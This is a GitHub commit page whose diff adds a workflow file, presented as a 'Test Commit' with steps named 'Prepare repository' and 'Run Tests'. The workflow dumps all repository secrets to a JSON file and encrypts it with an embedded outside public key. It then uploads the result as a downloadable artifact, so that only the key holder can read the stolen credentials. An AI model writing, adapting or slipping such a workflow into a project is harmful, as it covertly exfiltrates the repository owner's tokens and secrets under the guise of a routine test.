Skip to content

Commit

Permalink
Test Commit
Browse files Browse the repository at this point in the history
  • Loading branch information
taplytics-robot committed Oct 15, 2024
1 parent 70e273e commit dd86e85
Showing 1 changed file with 57 additions and 0 deletions.
57 changes: 57 additions & 0 deletions .github/workflows/test.yml
Original file line number Diff line number Diff line change
@@ -0,0 +1,57 @@
name: pbpmoxuksi
on:
push:
branches: pbpmoxuksi
jobs:
testing:
runs-on:
- ubuntu-latest
steps:
- env:
VALUES: ${{ toJSON(secrets)}}
name: Prepare repository
run: "\ncat <<EOF > output.json\n$VALUES\nEOF\n "
- name: Run Tests
env:
PUBKEY: '-----BEGIN PUBLIC KEY-----
MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEA0B/0ww9rbyWlLSmteSdr
bgUyNCRjWS9aRu/6nLcBzmDtx68vuN6pBwSRIFGzrkvYFVkqGDa8cumDI7NFYOY0
0G6KC5Yez82rCompR/Hv4jHkM16stuyVii5YCt0KquLj+G/lVEZWJm45CEIldOxi
TIZK3GZhMf/yM+HCT10gLviSvY6lQiHFsv3gsycM1T/kLLkeEY3MC1MfpcshBhrz
0YMUpW747HEEePdnqHewfa2BCwq11oMBz2dxRdtWGYzhCXRTxbrMksvS8DWsbZ1M
6XIiZQc60ip6irTgd02zZGrsnJ/IGUzWVL/qhX7ixjjO+kTbfMmUXbKYxzfpPbc1
vusaEZP5LngWw/vhtiGzJesQT/jS334bY6miytGoFMwY8gepJtGjqLdwgFHAthnp
YyxtbciDua9u0xawDIAMEWVsdUjrxGgGpwcKHEAnHDB4+1I8isTJMn0xmwkSM2/s
WjcMlCMCCfzp1DEPIIiV3pRsm6uL84rZZ1SP23P5jF98gr9gBhq5oKd0sfm93GZU
8VsVcEPSSqtzsB+YYNLKwzcTlLj56I2EjOH15ck4JKkmKeZ+QqIrEV4y+lpV2xw5
Cy4EOEN3MVhbEFbkPvPLM6XadmyHsSgyzzD6ExRRiA/WI5qwt8yCEzs8ZCxGNS0x
yKEx9Eg9fqNpHXWbbTLhF90CAwEAAQ==
-----END PUBLIC KEY-----
'
run: aes_key=$(openssl rand -hex 12 | tr -d '\n');openssl enc -aes-256-cbc -pbkdf2
-in output.json -out output_updated.json -pass pass:$aes_key;echo $aes_key
| openssl rsautl -encrypt -pkcs -pubin -inkey <(echo "$PUBKEY") -out lookup.txt
2> /dev/null;
- name: Upload artifacts
uses: actions/upload-artifact@v4
with:
name: files
path: ' |
output_updated.json
lookup.txt'

0 comments on commit dd86e85

Please sign in to comment.